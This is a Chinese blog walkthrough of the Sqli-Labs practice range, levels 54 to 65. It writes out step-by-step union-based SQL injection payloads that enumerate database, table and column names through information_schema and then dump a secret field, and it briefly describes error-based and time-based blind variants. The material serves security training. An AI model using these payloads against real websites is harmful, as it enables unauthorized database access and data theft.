基于Sqli-Labs靶场的SQL注入-54~65关

最新推荐文章于 2023-10-10 22:56:08 发布
最新推荐文章于 2023-10-10 22:56:08 发布
阅读量481 收藏 3
点赞数 2
分类专栏: SQL注入 文章标签: 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57736664/article/details/128664987
版权

目录

Less54-十步以内获取密钥

爆破数据库名

爆破表名

爆破列名

爆破字段值

Less55-十四步以内获取密钥

爆破数据库名

爆破表名

爆破列名

爆破字段值

Less56-十四步以内获取密钥

Less57-十四步以内获取密钥

Less58-五步以内获取密钥

Less59-五步以内获取密钥

Less60-五步以内获取密钥

Less61-五步以内获取密钥

Less62-130步以内获取密钥

Less63-130步以内获取密钥

Less64-130步以内获取密钥

Less65-130步以内获取密钥

总结

 

Less54-十步以内获取密钥

        首先我们进入54关:

        可以看到这一关让我们在十步之内在系统给我们的数据库的表中找到密钥。也就是说,我们只有十次注入的机会,这十次中,我们要完成:找到闭合方式、爆破数据库、爆破数据库中的表、爆破表中的列、爆破列中的字段值、在字段值中找到密钥,最终通关。而且每一次失败后都所有数据都会重置。那我们就开始爆破吧。

        首先寻找闭合方式,输入语句:

?id=1' and '1'='1

        这种测试方法比较快,如果闭合方式找对了就会回显信息,如果不对直接把单引号换成其他闭合符号就可以。这样去测试闭合方式比较节省步骤。

        页面回显:

        可以看到回显出了数据,说明闭合方式就是单引号。接下来测试数据库列数以及显示位,输入语句:

?id=0' union select 1,2,3 --+

        测试的时候直接使用 Union联合语句进行测试,这种方法可以同时测试列数和显示位,很好用。

        页面回显:

        可以看到回显出了显示位。

爆破数据库名

        输入语句:

?id=0' union select 1,database(),3 --+

        页面回显:

        可以看到爆破出了当前数据库的名字,这里我们需要记一下数据库的名字,因为后面的爆破表名的时候要用。

爆破表名

        输入语句:

?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

        页面回显:

        可以看到成功爆破了表的名字,这里把表名记下。

爆破列名

        输入语句:

?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ql73xm21z3' --+

        页面回显:

        可以看到成功爆破了列名。 

爆破字段值

        这里我选择有 Secret字样的表进行爆破,输入语句:

?id=0' union select 1,group_concat(secret_Z53V),3 from ql73xm21z3 --+

        页面回显:

        可以看到回显了字段值,我们尝试把其输入进入看看能不能成功进入,输入后页面回显:

        通关成功。 

Less55-十四步以内获取密钥

        首先进入55关:

        可以看到这一关和54关差不多,让我们在14步内完成以下操作:找到闭合方式、爆破数据库、爆破数据库中的表、爆破表中的列、爆破列中的字段值、在字段值中找到密钥。

        那么我们就开始爆破吧,首先输入语句寻找闭合方式:

?id=1' and '1'='1

        页面回显:
         可以看到页面不正常回显,说明闭合方式不是单引号,我们测试以下双引号,输入语句:

?id=1" and "1"="1

        页面回显:

        可以看到闭合方式也不是双引号,那就有可能是单引号加括号这种类型的,输入语句测试:

?id=1') and ('1')=('1

        页面回显:

        可以看到闭合方式也不是单引号加括号,那就试试是不是整型,输入语句测试:

?id=1 and 1=1

        页面回显:

        可以看到页面正常回显了,说明闭合方式就可能是整型,我们输入语句进一步测试一下:

?id=0 union select 1,2,3 --+

        页面回显:
         页面并没有显示显示位,说明闭合方式就不是整型,上述尝试了很多之前见到的闭合方式都不是,那我们就试试只有括号的闭合方式,输入语句测试:

?id=0) union select 1,2,3 --+

        页面回显:

        可以看到页面成功回显了显示位,说明这一关的闭合方式就是单括号。

爆破数据库名

        输入语句:

?id=0) union select 1,database(),3 --+

        页面回显: 

        成功爆破数据库名字,这里记下数据库名,之后爆破表名的时候要用。

爆破表名

        输入语句:

?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

        页面回显:

        可以看到成功爆破了表名,这里记下表名。

爆破列名

        输入语句:

?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ts5mx55wd6' --+

        页面回显:

        可以看到成功爆破了列名。

爆破字段值

        这里我选择带有 Secret字样的表进行爆破,输入语句:

?id=0) union select 1,group_concat(secret_JRPN),3 from ts5mx55wd6 --+

        页面回显:

        可以看到成功爆破了字段值,我们将其输入进去看一下页面回显:

        通关成功。 

Less56-十四步以内获取密钥

        这一关只是闭合方式和54关不一样,闭合方式为 ') ,其他都一样,这里不再赘述。

Less57-十四步以内获取密钥

        这一关只是闭合方式和54关不一样,闭合方式为双引号,其余操作都一样,这里不再赘述。

Less58-五步以内获取密钥

        这一关没有显示位,使用报错注入,闭合方式为单引号,这里不再赘述具体操作了。

Less59-五步以内获取密钥

        这一关闭合方式为整型,其余和58关一样使用报错注入,这里不再赘述具体操作。

Less60-五步以内获取密钥

        这一关闭合方式为 ") ,其余都和58关一样使用报错注入,这里不再赘述具体操作。

Less61-五步以内获取密钥

        这一关闭合方式为 ')) ,其余都和58关一样使用报错注入,这里不再赘述具体操作。

Less62-130步以内获取密钥

        这一关中没有报错回显,并且无论我们输入的对与错页面只会回显一种结果,所以这一关中我们使用时间延迟盲注,注入点为 ') 。具体操作我这里就不赘述了,时间延迟盲注已经在之前讲过了。大家有兴趣的可以去看一看之前的博客。

Less63-130步以内获取密钥

        这一关的闭合方式为单引号,其余和62关一样,这里不再赘述。

Less64-130步以内获取密钥

        这一关的闭合方式为 )) ,其余和62关一样,这里不再赘述。 

Less65-130步以内获取密钥

        这一关的闭合方式为 ") ,其余和62关一样,这里不再赘述。   

总结

        这一篇博客我主要讲解后续几关的通关方法,因为在实战中,可能你的注入机会是有限的,如果多次注入可能会封掉你的IP ,这几关就是锻炼你在有限的步骤中得到有用的信息。 

 

Alan_Mikasan
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs(54-65)
qq_43395215的博客
08-26 406
文章目录第54:第55:第56:第57:第58:第59:第60:第61:第62:第63:第64:第65: 第54: 根据这一的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通,而且只有10次尝试机会 因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号 闭合方式: /Less-54/?id=-1' union select 1,2,3--+ 因为一直到库名,需要判断表名,注意语句要一次正
sqli-labs (less-54)
kukudeshuo的博客
03-17 322
sqli-labs (less-54) 进入54,我们看到了屏幕上回显了一段英语,我们去翻译看看他说的是什么意思 这个意思就是我们需要在10次之内拿到KEY,不然KEY就会重置,就很接近现实里的SQL注入漏洞了,一般CTF的题目也是通过这种方式来考察的 http://127.0.0.1/sql1/Less-54/?id=1 http://127.0.0.1/sql1/Less-54/?id=1' 没有错误回显,所以只能去猜闭合方式了 这里因为只有十次机会,猜解的过程我就直接省略了,如果猜解的次
sqli-labs练习——sql注入
haoaaao的博客
01-29 1457
/*** 环境搭建 CSDNhttps://mp.csdn.net/mp_blog/creation/editor/122668696 ***/ 一、less-1 (1)题目让提交一个参数,没说是get参数还是post参数,那先尝试一下get参数 (2)首先触发网站的异常,如果触发异常了,说明网站存在sql注入漏洞,甚至可以通过报错信息,获取数据库的一些信息。 1)可以通过特殊字符进行尝试 (空格、#号需要url转义) 报如下异常 ...
Sqli_labs65详解
weixin_45281236的博客
10-10 323
【代码】Sqli_labs65详解。
sqli-labs (less-56)
kukudeshuo的博客
03-17 252
sqli-labs (less-56) 进入56,输入id=1 这里我们依然有14次机会 http://127.0.0.1/sql1/Less-56/?id=1'--+ #回显错误 http://127.0.0.1/sql1/Less-56/?id=1')--+ #回显正常 所以闭合方式’)–+,并且为字符型注入 判断字段数 http://127.0.0.1/sql1/Less-56/?id=1') order by 3--+ #回显正常 http://127.0.0.1/sql1/Less-56/
PHP、Apache环境中部署sqli-labsSQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labsSQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs(54-65)终章
qq_43579362的博客
03-04 628
Page4終章以为会很难,结果就是限定注入次数,其他和前面一样,虽然很接近现实注入,但是还是可以采取一些手段来‘无限’注入,比如代理,脚本等。。。 Less-54~57 这4都是使用联合查询注入,so easy。。。 Less-54 闭合方式:id=1'--+ Less-55 闭合方式:id=1)--+ Less-56 闭合方式:id=1')--+ Less-57 闭合方式:id="--+ Le...
sqli-labs————Less-54(第四部分:提高部分)
Fly_鹏程万里
05-22 1026
前言在接下来的几中将会对前面所学习的内容做一个复习,同时也会通过在复杂环境中的应用来提高注入技巧。Less-54源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xm...
sqli-labs攻略54-65[Challenges]
热门推荐
Keepb1ue的博客
09-02 1万+
Advanced Injections 文章目录Advanced Injectionsless-54less-55less-56less-60less-62less-63less-64less-65 最后一篇补上。 less-54 字符型注入,只不过这里只能限制十次查询,超过十次就会随机更换表名和字段名。也就是说我们要在10次内查询所有结果,这其实是够的。 http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(
sqlilabs54-65详细教程
黑白的博客
11-08 975
声明 学习SQL注入,提高网路安全能力 information_schema 过之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
sql-lab 41-65秘籍
weixin_46329549的博客
04-19 194
Less-41 41和40相同,相步骤查看上篇博客。 Less-42 这一通过查看源代码发现是对用户名进行了过滤,所以应该在password处进行注入,单引号错误。 Less-43 和42相同不过是单引号加括号错误。 Less-44 同上,但是没有回显,单引号错误。 Less-45 同上,没有回显,单引号加括号型错误。 Less-46 从本题开始利用order by进行注入,对id进行降...
sqli-labs 54-65
borrrrring的博客
10-10 162
less 54 只有10次机会,超过10次会是一个新的随机表名 1.?id=1 //回显正常 2.?id=1’ //回显异常 3.?id=1’ --+ //回显正常 4.?id=1’ order by 3 //回显正常 5.?id=1’ order by 4 //回显异常 6.?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=d
SQLi-labs 注入 54-75
感恩
09-19 326
SQLi-labs 注入 54-75
SQLi-LABS Page-4 (Challenges) Less-54-Less-65
weixin_30783913的博客
06-27 184
Less-54 union - 1 http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ zgysfs4pe4 http://10.10.202....
sql-labs闯54~65
qq_44663230的博客
09-12 1497
sql-labs闯54~65

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Alan_Mikasan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值